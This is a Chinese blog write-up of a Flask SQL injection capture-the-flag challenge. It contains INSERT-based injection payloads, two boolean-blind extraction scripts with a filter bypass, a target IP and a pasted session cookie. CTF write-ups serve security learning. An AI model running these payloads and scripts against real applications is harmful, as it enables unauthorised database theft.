攻防世界 WEB Web_python_flask_sql_injection

最新推荐文章于 2024-04-16 23:08:28 发布
最新推荐文章于 2024-04-16 23:08:28 发布
阅读量930 收藏
点赞数
分类专栏: 攻防世界 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/121897830
版权

没啥好说的,题目已经把几个关键点给出来了,flask,sql注入,还给了源码
那么就是源码审计,这题sql注入的点属实是有点多,普通的也有,难的也有,也难怪他是个九分题
干就完了,下载源码,第一个注入点是routes.py里面的index路由项

res = mysql.Add("post", ['NULL', "'%s'" % form.post.data,
                                 "'%s'" % current_user.id, "'%s'" % now()])

直接了Add操作,那么这个函数的原型在哪呢,打开pycharm,查找他的原型
发现在others里

 def Add(self, tablename, values):
        sql = "insert into " + tablename + " "
        sql += "values ("
        sql += "".join(i + "," for i in values)[:-1]
        sql += ")"
        try:
            self.db_session.execute(sql)
            self.db_session.commit()
            return 1
        except:
            return 0

是的,你没有看错,没有任何过滤,他就把sql语句传进数据库了,从调用链来看应该是从__init__.py里面的mysql对象直接调用
routes.py然后再到others.py,也就是这条分链上说没有任何的过滤机制
对照原型,tablename是post,values就是我们[‘NULL’, “’%s’” % form.post.data,"’%s’" % current_user.id, “’%s’” % now()]
其中我们可控的是%form.post.data,是由我们前端post过去的
那么post.data是哪里来的呢,我们在forms.py里面找到了PostForm类,结合之前的东西,我们可以猜出,这就是主页里的留言板

class PostForm(FlaskForm):
    post = StringField('Say something', validators=[DataRequired()])
    submit = SubmitField('Submit')

总的逻辑都走完了,留言板这块是一点过滤都没有,这也就是最简单的一块,随便注
下面我们要找的是回显逻辑
current_user调用followed_posts方法,找原型,定位到models.py里的

def followed_posts(self):
    followedid = mysql.All(
        'followers', {"follower_id": self.id}, ['followed_id'])
    tmp = ""
    for i in followedid:
        tmp += str(i[0]) + ","
    followed = mysql.Sel('post', {
                         "user_id": "(%s)" % tmp[:-1]} if tmp[:-1] != "" else {"user_id": "(-1)"}, where_symbols="in")
    own = mysql.Sel('post', {"user_id": self.id}, order=["id desc"])
    posts = mysql.Unionall([followed, own])
    return posts

全是others里面的函数,逻辑也不复杂,大家自己慢慢看吧,那么就直接给payload分析一下

a','1','2021-12-12'),(Null,(select database()),'1','2021-12-12')#

最后的insert语句被拼接成了
insert into post values(NULL,‘a’,‘1’,‘2021-12-12’),(NULL,(select database()),‘1’,‘2021-12-12’)#
回显flask数据库被爆出来了,那后面的事情不是轻飘飘吗,一直换payload,不就得了?没啥好说的,组合拳
先爆表名: a','1','2021-12-12'),(Null,(select group_concat(table_name) from information_schema.tables where table_schema = 'flask'),'1','2021-12-12')#
回显里有flag,表名已知,爆列名

 a','1','2021-12-12'),(Null,(select group_concat(column_name) from information_schema.columns where table_schema = 'flask' and table_name = 'flag'),'1','2021-12-12')#

拿flag:

a','1','2021-12-12'),(Null,(select flag from flag),'1','2021-12-12')#

后面几个点我是看了这位大佬的文章,https://blog.csdn.net/weixin_44604541/article/details/109025678
果然大佬的思路就是广,都是布尔盲注,根据页面回显来判断是否是正确的,对于buuctf这样的靶场很有可能就跑不了,好在这里是攻防世界
简单说下思路吧
1.register页面里的email会去数据库里查询,根据存在和不存在的回显进行布尔盲注。
逻辑也不复杂,利用点在forms.py里的RegisterForm类里的validate_email,因为它完全没有过滤
(需要改的地方是url和邮箱地址,我注册的时候是以qq.com结尾的,视情况而定):

import requests
from bs4 import BeautifulSoup

url = "http://111.200.241.244:55767/register"

r = requests.get(url)
soup = BeautifulSoup(r.text,"html5lib")
token = soup.find_all(id='csrf_token')[0].get("value")

notice = "Please use a different email address."
result = ""

database = "(SELECT/**/GROUP_CONCAT(schema_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION_SCHEMA.SCHEMATA)"
tables = "(SELECT/**/GROUP_CONCAT(table_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION_SCHEMA.TABLES/**/WHERE/**/TABLE_SCHEMA=DATABASE())"
columns = "(SELECT/**/GROUP_CONCAT(column_name/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/INFORMATION_SCHEMA.COLUMNS/**/WHERE/**/TABLE_NAME=0x666c616161616167)"
data = "(SELECT/**/GROUP_CONCAT(flag/**/SEPARATOR/**/0x3c62723e)/**/FROM/**/flag)"


for i in range(1,100):
    for j in range(32,127):
        payload = "test'/**/or/**/ascii(substr("+  data +",%d,1))=%d#/**/@qq.com" % (i,j)
        post_data = {
            'csrf_token': token,
            'username': 'a',
            'email':payload,
            'password':'a',
            'password2':'a',
            'submit':'Register'
        }
        r = requests.post(url,data=post_data)
        soup = BeautifulSoup(r.text,"html5lib")
        token = soup.find_all(id='csrf_token')[0].get("value")
        if notice in r.text:
            result += chr(j)
            print(result)
            break

2.edit_profile函数,利用点同样是valid_note函数,只不过多了个过滤函数,但是还是可以绕过的,具体的绕过地方在payload里substring那块
脚本需要改的地方,url,自己的cookie(edit页面需要先登录),post里面的username
需要说的是爆破有风险,且爆且珍惜,连接数超标报错纯属正常

import requests
import re

url = "http://111.200.241.244:55767/edit_profile"
cookie = {"session": ".eJzNlluPozYcxb9Kled5AAO5rNSHpBBENDZKYsLa1WrFbQCDM6OZzEJYzXfvIaPZbjNV1UrdqonIxYD998_nHPN1krb3WfM0-fB1MpsWVp6bKUkXTuLkKX5ZlpOTZGrN7bm1KHIjM5PF3E7SWZYRKydOPp3d3WWFnRj5NB_7qJKnavz-KZ18mLBBtpTsGhoHZ6EaU_BDI9S6pooOLN6eBRdD6G5tOrStdFeKxp4TurtKqFyJIRikG5jSFZbUUkm-q6i_JXL588-Tl5tJVdRldZp8IDeT4_0xK74NKvarNv24Mor9qk79hUq61xseHosv3y4KfWoJte1C3pxpTDuqKsXiqKdqUzESEeoG55CLjupgYIRVlEsV-p7JuGwlr1o6UEdq2kt_hxmtKqrKXm5fBzo9JsenJDvV90dg_fUTmubZLLWNxYKYmUHmmVOYhCSzYmoQssBHas2yxJxm88RxpkUxLyxrcZeZeZ6nRkLmZvGO7I-s_42seU12762D7b4r9_vViu9X0d6Lym2zDvfnVcjNrHpHWaolRtgSwds6dD2LDutW8E0tBllT30PlDGu9VkJ7RGjMgngO1RLVBH3o5q3U24G5AWbTmDjOVC1J-OeUr5WnBZRTWlIJm5ItobxtQ74cZOxZUJ4jVdBJ37MEAa_B61ARFIY2LRzqHhrJcw1WGpVDmZFF40PLyteR6-PD8-ky5KveVInuqcW0d2JaNuEvhiFIZNzGmzrk5Ym5B4VlOEsd2AICn7x8upncP5_eOkny_PG7dd00jFcNG6rx5jNT2YCOe6GqJvTXNYgObKBo9wjVcJbv2WEcgRzecAojW0fwXS05KA6rWro7BdcYDPOlfgCCDYhW6kKUR73gURe6TT-SZbh-nF-i75-PqG1xed38ESwwNWHsQXg7hUIMCAhi8s4slopyVjNV4dhoEIEAPRLG1IRIHeZvUXRjh25mUwVOXBCpSotxz5BvYPNvw1A36zFEw2JxEnD_CJURr78d2XBxYirqmQvtopvQrVD3y801So7qYqaEimwxZGcI7ExRkYgRQDyzpTo0sMhZup5BYyzxsAW-9SWgsPCddKkRIrAA1majjWKEVbzWQGUCWYe17FmM86OAIXBIy0GJFko3xUDN71GaVxSZj-WIA8L0oaKuZ9N4pxmRrRg2NdggNA-aEphFrSFPtMUbDSM4lAc24xvEZ9WG_gHtBy2GtR4Nxd5TlCoahI5MEQcn6bKG1oZBSWDexsEg4u0JJUOq3kUVFJ2AIrT5VJfH5PT8WPyu8Uut8baHQXvUSzDnamSKOiE1OlrKYK4AkwCKAI_hoCA5U6jMZm4Gjo1BR9Mr6oA1JBp0TOWN9AXO5S0b2hqegckjm_Il1k0Q6jMd8syR3OvgmZcxR-8MhOI0WaRzc2aZRULSbDpGpJklqZmlyTTNDCtZkLuEEHM-K-5yyyZTY-EYC0KM6eJdjv7IhHrLUeM6Rw9-1Qbr3UMaH4bAXQ63xkOV1vMzdZdO4LF7ETtKxv1TagVlSuxSHDcPqX7Cb1Fm5KBS4jSBv6mSuP-Sf9yWUi_O439c836nQ6fdv34s_1YGq2XH3E2F3IVXG0Nq5JJa1czFfuNSRMESWQvRcw-Z1oxR0Y-GDP3IZGrVMLKrhV4jXqRGdJhjxIirDP6rKP0_-d-4vK6z1G2ccYOWGhXyrMeIFoK9w6OSRf2oYzEehUiAtk2FQFcS53A9EUMJB62QsSVBH6hyjc1KGJTDhct3KfDPN6jrFBjNhz7L4lg81U-fL0-Mn_8zH53vnx8_5zVYHnPIzHj5DcIvbvQ.YT3Avg.EktFRcRzwnBzPB8QxySXl_sSqNQ"}
regexp = r'value="(.*)"'  # 正则表达式 , 用于捕获所有 value 字段的值


# 获取 csrf_token
def get_csrf_token():
    # 发送 GET 请求
    response = requests.get(url, cookies=cookie)
    # 获取 HTTP 响应数据包
    res = response.text
    #print(res)
    # 进行正则匹配 , 发现返回列表中第一个 value 键值对就是 csrf_token 的值 , 获取它
    csrf_token = re.findall(regexp, res)[0]
    print(csrf_token)
    return csrf_token


# 发送修改 profile 的 post 数据包
def post_profile():
    result = ""
    # 调用 get_csrf_token 函数 , 得到 csrf_token 数据包
    csrf_token = get_csrf_token()
    for i in range(1, 43):
        # 猜测版本信息由可显字符组成( 31 < ASCII < 127 )
        for j in range(32, 127):
            # 具体的 Payload , 用户可自行选择
            # 1. 爆出当前数据库( flask )
            # datas = {"csrf_token":csrf_token,"username":"a","note":"1' and (select 1=(ascii(substring((select database()) from " + str(i) + "))=" + str(j) + ")) and '1'='1","submit":"submit"}
            # 2. 爆出含有 flag 的表( flag )
            # datas = {"csrf_token":csrf_token,"username":"a","note":"1' and (select 1=(ascii(substring((select group_concat(table_name) from information_schema.tables where table_schema = 'flask') from " + str(i) + "))=" + str(j) + ")) and '1'='1","submit":"submit"}
            # 3. 爆出含有 flag 表中的字段 ( flag )
            # datas = {"csrf_token":csrf_token,"username":"a","note":"1' and (select 1=(ascii(substring((select group_concat(column_name) from information_schema.columns where table_schema = 'flask' and table_name = 'flag') from " + str(i) + "))=" + str(j) + ")) and '1'='1","submit":"submit"}
            # 4. 爆出 flag 值 ( flag ) , 建议将 i 的范围修改为 range(1,43)
            # 正则过滤了逗号 , 我们可以使用 substring(a from b) 这种格式取代 mid() 函数 , 从而绕过限制 .
            datas = {"csrf_token": csrf_token, "username": "test",
                     "note": "1' and (select 1=(ascii(substring((select flag from flag) from " + str(i) + "))=" + str(
                         j) + ")) and '1'='1", "submit": "submit"}
            response = requests.post(url, data=datas, cookies=cookie,timeout=5)
            res = response.text
            # 进行正则匹配 , 如果这里 select 1=payload 返回 1 时 , 返回数据包中的 note 字段就会显示为 1 , 反之为 0
            # 经过正则匹配 , 发现返回列表中第三个 value 键值对就是 note 的值 , 获取它
            test = re.findall(regexp, res)[2]
            print(test)
            # 如果发现匹配的内容 , 则返回该ASCII编码对应的字符 , 并且跳出本次循环
            if (test == str(1)):
                result += chr(j)
                print(result)
                break


if __name__ == '__main__':
    post_profile()

参考视频链接:https://www.bilibili.com/video/BV16a411r7Ph/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1011
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
flask mysql sql注入_SQL注入进阶-Flask中转SQLMAP案例
weixin_33195162的博客
02-04 632
前言在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞,并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀,我不断思考遇到这类型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外,有没有一个比较优雅的解决方案呢?一道CTF题的思考先来说说“张三的网站”这道题目,因为我手上没有题目源码,所以就根据记忆中的各个功能自己写了一个(很少写php,...
Web_python_flask_sql_injection攻防世界web
weixin_43610673的博客
07-21 1140
目录/index路由/login路由/register路由/edit_profile路由 主要功能就是登陆注册,修改个人信息,能留言 然后可以关注别人 下载附件审计,先看路由 route.py /index路由 不存在过滤 关键是结果直接回显 追踪到Others.py的Add函数 a’,‘1’,‘2020-7-20’),(Null,(select database()),‘1’,‘2020-7-20’)# 最终Payload: a’,‘1’,‘2020-7-20’),(Null,(select fla
Python Flask Web开发:深入SQLAlchemy实践与安全防护策略
最新发布
weixin_45002431的博客
04-16 783
Python Flask作为一款轻量级且灵活的Web框架,常与SQLAlchemy ORM结合使用,以构建高效、结构化的数据库交互层。本文将详述SQLAlchemy的使用方法、注意事项,并探讨如何通过最佳实践来防范SQL注入攻击。同时,我们将阐述Jinja2模板引擎的常规与高级用法及其安全注意事项,为Python Flask Web开发提供全面的指导。
攻防世界--Web_python_flask_sql_injection
qq_46263951的博客
01-10 227
一开始看题目还以为是一道Flask+SQL的题,这里出现的漏洞点都是在SQL 代码审计: 路由执行代码都在routes.py,自定义函数在others.py add:插入 del:删除 mod:更新 sel:查询 /index路由: 发现没有任何过滤,插入第一条语句用来闭合,第二条执行注入 a','1','2022-1-1'),(Null,(select database()),'1','2022-1-1')# ...
flask mysql sql注入_FlaskJinja2 SQL注入绕过姿势
weixin_39637397的博客
02-04 259
0x00 获取基本类首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2中存在的对象,比如request):''.__class__.__mro__[2]{}.__class__.__bases__[0]().__class__.__bases__[0][].__class__.__bases__[0]request.__class__.__...
flask-sql-xss-injection-check:Flask扩展名,用于检查传入请求上SQL和XSS注入
04-05
Flask-SQL-XSS-注入检查 Flask扩展,用于支持对传入请求SQL和XSS注入检查。 对于SQL或XSS注入检查为肯定的请求,这将返回400错误的请求响应 安装 使用pip或easy_install安装扩展。 $ pip install -U flask-sql-xss-injection-check 用法 该软件包公开了Flask扩展,该扩展检查所有传入请求SQL和XSS注入攻击。 from flask import Flask from flask_sql_xss_injection_check import SQLXSSCHECK app = Flask ( __name__ ) SQLXSSCHECK ( app ) @ app . route ( "/" ) def helloWorld (): return "Hello, safe world!
api.rar_API_IML语言_orwxh_python flask
09-23
Python Flask是一个轻量级的Web服务器网关接口(WSGI)微框架,非常适合快速开发API。它的核心概念是路由、视图函数和模板。路由定义了URL结构,视图函数处理请求并返回响应,而模板则用于生成HTML或其他类型的动态...
douban_flask_pythonflask豆瓣_python_
10-02
标题 "douban_flask_pythonflask豆瓣_python_" 暗示了这是一个使用 Python 的 Flask 框架来实现的项目,目标是爬取并处理豆瓣电影Top250的数据。Flask是一个轻量级的Web服务程序,适合用于构建小型到中型的Web应用。...
第三次课c3.zip_flask_flask网站_网站 python
09-23
在本课程中,我们将深入探讨如何使用Python的Flask框架构建一个类似Instagram的网站。Flask是一个轻量级的Web服务器...通过学习和实践这个项目,开发者将能更好地理解和掌握如何用Python和Flask构建功能丰富的Web应用。
FLASK_BUILDING_PYTHON_WEB_SERVICES
01-30
Unleash the full potential of the Flask web framework by creating small to large and powerful web applications.
flask mysql sql注入_(五)Flask与SQLAlchemy的集成和简单使用
weixin_35867508的博客
02-23 688
tips:本文主要介绍Flask与SqlAlchemy的集成和简单使用本文基于python3编写前言在实际的生产中,往往都需要数据库来做数据存储以及信息交互。本文选用SQLAlchemy作为orm工具,可以减少sql代码编写以及防止sql注入的风险的存在。本文使用免费的mysql数据库。Flask与SQLAlchemy结合1、安装flask-sqlalchemy pip install f...
flask mysql sql注入_防止sql注入
weixin_36451983的博客
02-06 1739
@server.route('/login',methods=['post'])def login():username=flask.request.values.get('u')password=flask.request.values.get('p')sql="select * from USER where username='%s' and password='%s';"%(usernam...
pythonsql注入_Python中防止sql注入的方法详解
weixin_39834678的博客
11-30 419
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编程时的疏忽,通过SQL语句,实现无帐号登录,甚至篡改数据库。下面这篇文章主要给大家介绍了关于Python中防止sql注入的方法,需要的朋友可以参考下。前言大家应该都知道现在web漏洞之首莫过于sql了,不管使用哪种语言进行web后端开发,只要使用了关系型数据库,可能都会遇到sql注入攻击问题。那么在Pyt...
[RootersCTF2019]I_<3_Flask --- sql注入新方法:---‘0’+‘0’的奇怪方式来做 --- 二次注入--hex双重编码- 16进制---ascii也可以的
Zero_Adam的博客
04-04 591
一、自己看WP后写脚本 我连注册登陆的脚本都写不好,,,写了半天,最后的那个submit不用管,直接就登陆了,然后每次要换一次 邮箱 和 账号 import requests register_url="http://f22e5570-b535-4c98-9bb4-62b097db515b.node3.buuoj.cn/register.php" login_url="http://f22e5570-b535-4c98-9bb4-62b097db515b.node3.buuoj.cn/login.php"
攻防世界WEB高手进阶之python_template_injection
uihijio的博客
05-18 433
打开网站是写着以下 然后测试以下{{1+1}}被执行了 然后测试{{’’.class.mro[2].subclasses()[71].init.globals[‘os’].listdir(’.’)}}发现有一个flag 使用{{’’.class.mro[2].subclasses()40.read()}}打开
攻防世界Web_python_template_injection
qq_42728977的博客
01-11 281
之前做过一次python沙盒逃逸的题,但是当时只是看WP没有仔细地深入,这次仔细的探究一下这个漏洞的原理和防御。在这里只是写一点开端,后续再深入,因为我看资料发现这个漏洞牵扯到的东西挺多的。 题目 Web_python_template_injection 原理 python模块注入、python沙河逃逸 环境 firefox、hackbar 流程 在题目的URL后面添加如下命令,就可以命令执行了...
web python template injection_攻防世界-Web_python_template_injection详解
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值